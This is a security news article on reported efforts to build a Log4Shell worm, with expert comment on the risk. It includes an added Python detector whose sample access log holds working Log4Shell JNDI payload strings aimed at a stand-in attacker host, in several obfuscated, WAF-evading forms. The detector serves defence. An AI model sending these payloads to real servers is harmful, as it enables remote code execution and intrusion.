Threat Groups Reportedly Working on Log4Shell Worm

Multiple threat groups are reportedly working on developing a worm that leverages the recently disclosed Log4j vulnerability.

Experts Comment on Concerns Related to Log4Shell Worm

Multiple threat groups are reportedly working on developing a worm that leverages the recently disclosed Log4j vulnerability, but many experts say that — if such a worm is created — it may not be as bad as it sounds.

It recently came to light that the widely used Log4j logging tool is affected by a critical remote code execution vulnerability that has been increasingly exploited by malicious actors, including profit-driven cybercriminals and state-sponsored groups. The vulnerability is tracked as CVE-2021-44228 and it has been dubbed Log4Shell and LogJam.

According to researcher Greg Linares, at least three groups — ones that have been linked to Eastern Europe, Russia and China — are looking into creating a Log4Shell worm, mostly for financially motivated attacks that involve extortion or selling access to compromised hosts to ransomware groups.

Linares said on December 13 that he had seen evidence suggesting that a worm would be developed in the next 24 to 48 hours, but there are currently no confirmed reports of such a worm spreading in the wild.

While the researcher’s claims have led to concerns that we might see another large-scale attack along the lines of WannaCry or NotPetya, several experts pointed out that a Log4j worm is not easy to develop and might not even be a priority for malicious actors.

“I think the fears of a worm are overblown,” said researcher Marcus Hutchins, who in 2017 found a way to disrupt the WannaCry attack. “Firstly, there’s already mass exploitation (you can spray the entire internet from one server). Secondly, worms take time and skill to develop, but most attackers are racing against the clock (patching and other attackers).”

“Also, due to the nature of the exploit there’s no standard way to exploit it. People have [resorted] to crudely stuffing the payload into HTTP requests, which you don’t need a worm to do. A worm would need a novel exploitation technique to gain any real value over scanning,” the researcher added.

Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, agrees that developing this type of malware takes a significant amount of time and effort, and there “hasn’t been any evidence to suggest this is a priority for threat actors at this time.”

“This activity differs from the WannaCry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue. It’s still very much early days with regards to Log4j. While many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm,” Morgan said.

John Bambenek, principal threat hunter at Netenrich, pointed out that a worm would have posed a bigger risk when the vulnerability was disclosed, but at this point — while there likely still are many vulnerable devices out there — many affected systems have already been patched or are protected by WAF rules.
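Both Hutchins’ observation that attackers simply stuff the payload into HTTP requests and Bambenek’s point that WAF rules now shield many hosts come down to the same defensive task: recognising a JNDI lookup string in logged request data, including the nested-lookup obfuscation (`${lower:…}`, `${::-x}`, URL encoding) that attackers use to slip past a naive search for `jndi:`. The detector below is an added example for this article, not code from SecurityWeek or from any of the researchers quoted; the access-log lines, IP addresses and `attacker.example` hostnames are constructed for illustration.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in HTTP access logs.

Added example, not code from the article or from any of the quoted researchers.
Attackers deliver the payload by placing a JNDI lookup string in any request
field the target may log (URL, User-Agent, X-Forwarded-For, ...), and commonly
obfuscate it with nested Log4j lookups so that a plain 'jndi:' grep misses it.
This detector URL-decodes each line, collapses the common lookup tricks, and
then looks for the tell-tale 'jndi:<scheme>:' sequence.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup: no nested braces or '$' inside the body.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately hunting for once obfuscation is stripped.
JNDI_REF = re.compile(r"jndi:([a-z]+):", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 16) -> str:
    """Resolve nested Log4j lookups used to hide 'jndi:' from pattern matching.

    Only the forms that dominate in-the-wild probes are resolved:
      ${lower:X} / ${upper:X}   -> X case-folded
      ${anything:-default}      -> default  (covers ${::-j}, ${env:NOPE:-j})
    The ${jndi:...} lookup itself and any other ${...} (e.g. an application's
    own template such as ${user.name}) are left untouched, so a benign
    template string never becomes a false positive.
    """
    def resolve(match: "re.Match[str]") -> str:
        body = match.group(1)
        lowered = body.lower()
        if lowered.startswith("jndi:"):
            return match.group(0)            # the payload we want to keep visible
        if lowered.startswith("lower:"):
            return body[len("lower:"):].lower()
        if lowered.startswith("upper:"):
            return body[len("upper:"):].upper()
        if ":-" in body:
            return body.split(":-", 1)[1]    # default-value trick: ${::-j} -> j
        return match.group(0)                # unknown lookup: leave as-is

    for _ in range(max_rounds):              # bounded so a hostile line cannot loop us
        new_text = INNER_LOOKUP.sub(resolve, text)
        if new_text == text:
            break
        text = new_text
    return text


def classify_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (verdict, jndi_scheme) for a suspicious line, or None if clean."""
    decoded = unquote(line)                  # %24%7B -> ${
    normalized = normalize_lookups(decoded)
    hit = JNDI_REF.search(normalized)
    if hit:
        return ("log4shell-probe", hit.group(1).lower())
    # A lookup we could not fully resolve but that still spells 'jndi': worth a look.
    if "${" in decoded and "jndi" in normalized.lower():
        return ("suspicious-lookup", "")
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan access-log lines; return (1-based line number, verdict, scheme) per hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        result = classify_line(line)
        if result is not None:
            findings.append((number, result[0], result[1]))
    return findings


# Constructed sample access-log lines (not real traffic): a benign request,
# four Log4Shell probes in obfuscation styles seen in the wild, and a benign
# request whose query string happens to carry a ${...} template.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://attacker.example/b}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/c}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:14 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.7 - - [13/Dec/2021:10:01:20 +0000] "GET /api?tpl=${user.name} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for number, verdict, scheme in scan_log(SAMPLE_LOG):
        print(f"line {number}: {verdict} scheme={scheme or '-'}")
```

Run against the constructed log, the script flags lines 2 to 5 as probes (LDAP, RMI, LDAP and DNS) and stays silent on the two benign requests. The same normalisation step is what a WAF rule has to perform before matching, which is why rules that look only for the literal string `${jndi:` are easy to bypass.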

Jake Williams, co-founder and CTO at BreachQuest, noted, “The vast majority of servers vulnerable to Log4Shell will be running the vulnerable process with very limited permissions. In most cases, a worm exploiting Log4Shell would probably not be able to achieve persistence across process restarts. Additionally, because the process probably doesn’t have filesystem permissions, we should be less worried about ransomware payloads. A malicious process can’t encrypt what it can’t write in the first place.”

“While we should absolutely expect a Log4Shell worm to be created, we shouldn’t conflate the expected damage of a worm with what has been seen in previous high profile worms,” Williams added.

Yaniv Balmas, VP of security research at Salt Security, believes a wormable exploit is “definitely a valid scenario” and it’s very likely that someone will embed the Log4Shell vulnerability into a worm that “will be almost impossible to stop once it reaches a critical mass.”

However, the expert pointed out that malicious actors don’t currently need a worm to easily launch Log4Shell attacks against millions of online services, and the extent of the damage could be even higher than in the case of a worm, which is automated and works “blindly.”

Casey Ellis, founder and CTO at Bugcrowd, also commented, pointing out, “While it can be argued that malicious attackers have more than ample opportunity to achieve their goals with Log4Shell without engineering a self-propagation mechanism, there is also a ‘hobbyist’ motivation around worming the exploit. Historically, many of the worms that were most impactful on the Internet were research projects which ended up being unexpectedly successful.”

Related: Log4Shell Tools and Resources for Defenders – Continuously Updated

Related: Industrial Organizations Targeted in Log4Shell Attacks

Related: Problematic Log4j Functionality Disabled as More Security Issues Come to Light

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
